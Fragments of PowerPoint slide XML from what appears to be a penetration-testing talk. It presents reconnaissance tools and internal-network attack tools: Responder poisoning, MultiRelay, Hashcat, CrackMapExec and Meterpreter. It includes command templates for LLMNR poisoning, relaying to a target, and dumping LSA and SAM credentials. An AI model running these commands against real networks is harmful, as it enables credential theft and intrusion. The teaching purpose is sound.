            <a:ext cx="3720463" cy="68580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736909B2-B036-46FD-B04B-17D2444B012B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8018098" y="4131273"/>
            <a:ext cx="2494875" cy="1303733"/>
            <a:chOff x="7528087" y="2680840"/>
            <a:chExt cx="2061939" cy="31619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83EA2CB-245D-4EE7-AC97-298365D6B3BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7528087" y="2680840"/>
              <a:ext cx="497966" cy="316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52D88F50-B8F2-4960-9408-B5FFE0BE85AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8026053" y="2680840"/>
              <a:ext cx="156397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D5ABC0A-410F-4E1F-B51A-C424EC0C65B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8401362" y="3732243"/>
            <a:ext cx="2133045" cy="1136713"/>
            <a:chOff x="838200" y="2992185"/>
            <a:chExt cx="1600200" cy="852868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FCCB020-4CF9-4F90-957C-F5248E4198D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="2992185"/>
              <a:ext cx="1600200" cy="254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Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Query Tools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3F4150-8A3A-44CF-AC51-C82AAA2B1052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="3326260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50" dirty="0">
                  <a:latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Shodan is a site used to query data scanned across the Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="AutoShape 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF27BF0-3DA8-4EBF-9BC7-08CC4DD5516E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10714687" y="3765649"/>
            <a:ext cx="273494" cy="38889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7647"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21599" y="8410"/>
                  <a:pt x="21443" y="9124"/>
                  <a:pt x="21132" y="9804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20820" y="10488"/>
                  <a:pt x="20404" y="11134"/>
                  <a:pt x="19880" y="11747"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12619" y="20679"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12095" y="21292"/>
                  <a:pt x="11491" y="21599"/>
                  <a:pt x="10804" y="21599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10112" y="21599"/>
                  <a:pt x="9520" y="21292"/>
                  <a:pt x="9024" y="20679"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1727" y="11718"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1203" y="11106"/>
                  <a:pt x="783" y="10462"/>
                  <a:pt x="472" y="9782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="156" y="9110"/>
                  <a:pt x="0" y="8398"/>
                  <a:pt x="0" y="7647"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="6594"/>
                  <a:pt x="279" y="5601"/>
                  <a:pt x="843" y="4669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1403" y="3737"/>
                  <a:pt x="2179" y="2921"/>
                  <a:pt x="3164" y="2227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4143" y="1538"/>
                  <a:pt x="5296" y="990"/>
                  <a:pt x="6615" y="595"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7936" y="197"/>
                  <a:pt x="9344" y="0"/>
                  <a:pt x="10819" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12315" y="0"/>
                  <a:pt x="13719" y="197"/>
                  <a:pt x="15023" y="595"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16335" y="993"/>
                  <a:pt x="17475" y="1538"/>
                  <a:pt x="18451" y="2227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19427" y="2921"/>
                  <a:pt x="20200" y="3737"/>
                  <a:pt x="20756" y="4669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21320" y="5603"/>
                  <a:pt x="21599" y="6594"/>
                  <a:pt x="21599" y="7647"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10819" y="11408"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11547" y="11408"/>
                  <a:pt x="12240" y="11309"/>
                  <a:pt x="12900" y="11114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13556" y="10922"/>
                  <a:pt x="14127" y="10651"/>
                  <a:pt x="14612" y="10310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15096" y="9968"/>
                  <a:pt x="15476" y="9564"/>
                  <a:pt x="15748" y="9107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16028" y="8650"/>
                  <a:pt x="16164" y="8158"/>
                  <a:pt x="16164" y="7645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16164" y="7131"/>
                  <a:pt x="16028" y="6642"/>
                  <a:pt x="15748" y="6176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15476" y="5713"/>
                  <a:pt x="15096" y="5304"/>
                  <a:pt x="14612" y="4951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14128" y="4604"/>
                  <a:pt x="13564" y="4327"/>
                  <a:pt x="12908" y="4135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12256" y="3943"/>
                  <a:pt x="11564" y="3842"/>
                  <a:pt x="10820" y="3842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10068" y="3842"/>
                  <a:pt x="9376" y="3940"/>
                  <a:pt x="8736" y="4135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8092" y="4327"/>
                  <a:pt x="7528" y="4604"/>
                  <a:pt x="7032" y="4951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6532" y="5304"/>
                  <a:pt x="6148" y="5713"/>
                  <a:pt x="5872" y="6171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5596" y="6628"/>
                  <a:pt x="5460" y="7119"/>
                  <a:pt x="5460" y="7642"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5460" y="8155"/>
                  <a:pt x="5596" y="8644"/>
                  <a:pt x="5872" y="9104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6148" y="9561"/>
                  <a:pt x="6532" y="9965"/>
                  <a:pt x="7032" y="10307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7528" y="10648"/>
                  <a:pt x="8092" y="10919"/>
                  <a:pt x="8736" y="11111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9376" y="11309"/>
                  <a:pt x="10068" y="11408"/>
                  <a:pt x="10819" y="11408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196">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1050"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0" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DA509C-0723-4D48-952B-5B9CB5F96D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10675030" y="1155587"/>
            <a:ext cx="440465" cy="32140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0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20630" y="0"/>
                  <a:pt x="20946" y="158"/>
                  <a:pt x="21208" y="475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21470" y="796"/>
                  <a:pt x="21599" y="1175"/>
                  <a:pt x="21599" y="1615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21599" y="19984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21599" y="20419"/>
                  <a:pt x="21470" y="20803"/>
                  <a:pt x="21208" y="21121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20946" y="21441"/>
                  <a:pt x="20630" y="21599"/>
                  <a:pt x="20263" y="21599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1370" y="21599"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1003" y="21599"/>
                  <a:pt x="683" y="21441"/>
                  <a:pt x="411" y="21121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137" y="20803"/>
                  <a:pt x="0" y="20422"/>
                  <a:pt x="0" y="19984"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="1615"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1175"/>
                  <a:pt x="137" y="796"/>
                  <a:pt x="411" y="475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="683" y="158"/>
                  <a:pt x="1003" y="0"/>
                  <a:pt x="1370" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20263" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19805" y="2162"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1804" y="2162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1804" y="19432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19805" y="19432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19805" y="2162"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5978" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3598" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3598" y="12784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5978" y="12784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5978" y="17886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9961" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7606" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7606" y="6973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9961" y="6973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9961" y="17886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14018" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11638" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11638" y="9561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14018" y="9561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14018" y="17886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18001" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15621" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15621" y="4920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18001" y="4920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18001" y="178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19043" tIns="19043" rIns="19043" bIns="19043" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="171196">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="105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07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46" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="59" grpId="0" animBg="1"/>
      <p:bldP spid="6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2646" y="310793"/>
            <a:ext cx="24609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RECON-NG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2376" y="1128543"/>
            <a:ext cx="1129255" cy="59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Roboto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7184" y="2803466"/>
            <a:ext cx="450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Modules useful for collecting extra targets, make sure you stay in scope!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184" y="2332994"/>
            <a:ext cx="302839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Gather Hosts/Netblocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1225777" y="1691728"/>
            <a:ext cx="742671" cy="54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Regular" charset="0"/>
              <a:ea typeface="Roboto Regular" charset="0"/>
              <a:cs typeface="Roboto Regular" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13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BDBAA98-1412-484B-ABE9-F93EA0916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456" y="0"/>
            <a:ext cx="456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12646" y="310793"/>
            <a:ext cx="246093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RECON-NG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52376" y="1128543"/>
            <a:ext cx="1129255" cy="59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Roboto Regula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7184" y="2803466"/>
            <a:ext cx="4508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Modules useful for collecting extra targets, make sure you stay in scope!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47184" y="2332994"/>
            <a:ext cx="352051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Gather Domains/Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1225777" y="1691728"/>
            <a:ext cx="742671" cy="540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Roboto Regular" charset="0"/>
              <a:ea typeface="Roboto Regular" charset="0"/>
              <a:cs typeface="Roboto Regular" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10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C3923C2F-8029-4CBD-88CE-CDB0DCB1C2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827" y="-81643"/>
            <a:ext cx="4560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1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4660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686219" y="1289133"/>
            <a:ext cx="1928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FOCA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Finds documents on websites and analyzes their metadata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github.com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ElevenPaths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/FOCA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 1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987D8C5-128B-B241-92D7-DCCE938B5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855" y="597913"/>
            <a:ext cx="8611673" cy="5662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55569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660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0315" y="1247882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Sample Network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275382" y="2728710"/>
            <a:ext cx="27504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Here’s our target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37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F664801C-1624-1749-8080-85902E06B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14" y="888098"/>
            <a:ext cx="8127861" cy="5953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1F3147-D7EB-CF41-86FC-469C12B6D387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497639" y="104796"/>
            <a:ext cx="787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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAMPLE NETWORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="706626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github.com/SpiderLabs/Responder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3FE4A2-6200-4F20-B8B3-00C61AA5E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263" y="662959"/>
            <a:ext cx="7002281" cy="55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24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github.com/SpiderLabs/Responder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A709D5-C8D6-4BCC-B294-29AD9B8F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responder –A –I eth0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Analyze mode: Allows you to see the requests on the network without poisoning any responses.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great for finding ICMP-redirect attack vectors.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B40ED-E848-45F6-89B2-1ECBBD3E7177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864844" y="235380"/>
            <a:ext cx="523091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Responder - Stealth Mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75912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C33E9-AEE7-4B7D-A67F-3DE94ED9C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Kateo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061F-D083-47B8-9497-8FB2C55FD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92400"/>
            <a:ext cx="5969000" cy="3327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Senior Security Consultant at Secure Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Previously worked at a Fortune 500 Utility company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Background is in system administration and network security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Close ties and relationship with audit and compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passion in SCADA/ICS and automation</a:t>
            </a:r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vajkat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site: withkate.io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BE7BF2-ED1B-C74D-A1AD-6BCCAE547876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5697045" y="2448758"/>
            <a:ext cx="242354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Roboto" charset="0"/>
                <a:ea typeface="Roboto" charset="0"/>
                <a:cs typeface="Roboto" charset="0"/>
              </a:rPr>
              <a:t>“WORDS ABOUT KATEO”</a:t>
            </a:r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99286C6C-CE02-B54B-824E-23999E641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9" r="3723"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4486261" y="9691"/>
            <a:ext cx="7705739" cy="6848309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 15433286"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 13716000"/>
              <a:gd name="connsiteX1" fmla="*/ 8930944 w 15433286"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 13716000"/>
              <a:gd name="connsiteX2" fmla="*/ 15433286 w 15433286"/>
              <a:gd name="connsiteY2" fmla="*/ 13715996 h 13716000"/>
              <a:gd name="connsiteX3" fmla="*/ 15433286 w 15433286"/>
              <a:gd name="connsiteY3" fmla="*/ 13716000 h 13716000"/>
              <a:gd name="connsiteX4" fmla="*/ 6502344 w 15433286"/>
              <a:gd name="connsiteY4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33286" h="13716000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8930944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15433286" y="13715996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15433286" y="13716000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6502344" y="13716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6117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SpiderLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Responder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2A709D5-C8D6-4BCC-B294-29AD9B8F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responder –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –I eth0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-w: WPAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-r: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wredir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-f: fingerprint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7B40ED-E848-45F6-89B2-1ECBBD3E7177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864844" y="197673"/>
            <a:ext cx="54729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Responder – Normal Mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237389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SpiderLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Responder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948945F-7C4F-46C4-A714-D27CA01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99" y="1006311"/>
            <a:ext cx="6619875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54729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Responder – Normal Mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243455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Hashcat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Password cracking software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hashcat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hashcat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611417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Hashcat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– Password Cracking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268A69-B5AC-4C2A-B570-89CA7C1DE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042" y="1023230"/>
            <a:ext cx="6172517" cy="522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SpiderLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Responder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588494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Responder – tools/</a:t>
            </a:r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Multirelay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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./RunFinger.py –g –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;victim subnet&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Multirelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –t &lt;target IP address&gt; -u ALL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3961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SpiderLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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948945F-7C4F-46C4-A714-D27CA01CF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999" y="1081725"/>
            <a:ext cx="6619875" cy="548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59966"/>
            <a:ext cx="64556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Responder – tools/Multirelay.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350657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Responder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 LLMNR, NBT-NS and MDNS poisoner.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SpiderLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Responder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59966"/>
            <a:ext cx="645561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Responder – tools/Multirelay.py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E6D18-94EF-44EF-A553-FDFF85D9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145" y="1082968"/>
            <a:ext cx="5041230" cy="519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8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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="26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CrackMapExec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swiss army knife for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> networks.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github.com/byt3bl33d3r/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CrackMapExec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1165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CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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E01808-4F4A-4DD8-8724-53392D03D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565" y="941736"/>
            <a:ext cx="7267735" cy="514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6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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="26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CrackMapExec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swiss army knife for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> networks.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github.com/byt3bl33d3r/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CrackMapExec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11655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CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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94220D-FD0B-4B97-BDA4-5ABE8FAC5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607577" cy="4693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CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;target IP or subnet&gt; -u &lt;username&gt; -p &lt;password&gt; -d &lt;domain&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lsa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CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;target IP or subnet&gt; -u &lt;username&gt; -p &lt;password&gt; -d &lt;domain&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sam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28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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="26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Meterpreter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Penetration Testing Framework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github.com/rapid7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-framework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59966"/>
            <a:ext cx="52629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Meterpreter -- </a:t>
            </a:r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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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276AA-0DD9-4069-B2E6-D7892948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137" y="1436365"/>
            <a:ext cx="7761525" cy="431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3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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="26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Meterpreter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Penetration Testing Framework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github.com/rapid7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-framework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59966"/>
            <a:ext cx="52629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Meterpreter -- </a:t>
            </a:r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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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C7CC3F-0D1B-41D7-9065-3908054FA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324" y="1327540"/>
            <a:ext cx="7951542" cy="360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07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8A2E8C-2813-814E-84A2-8993A0C8300F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4660" y="4464718"/>
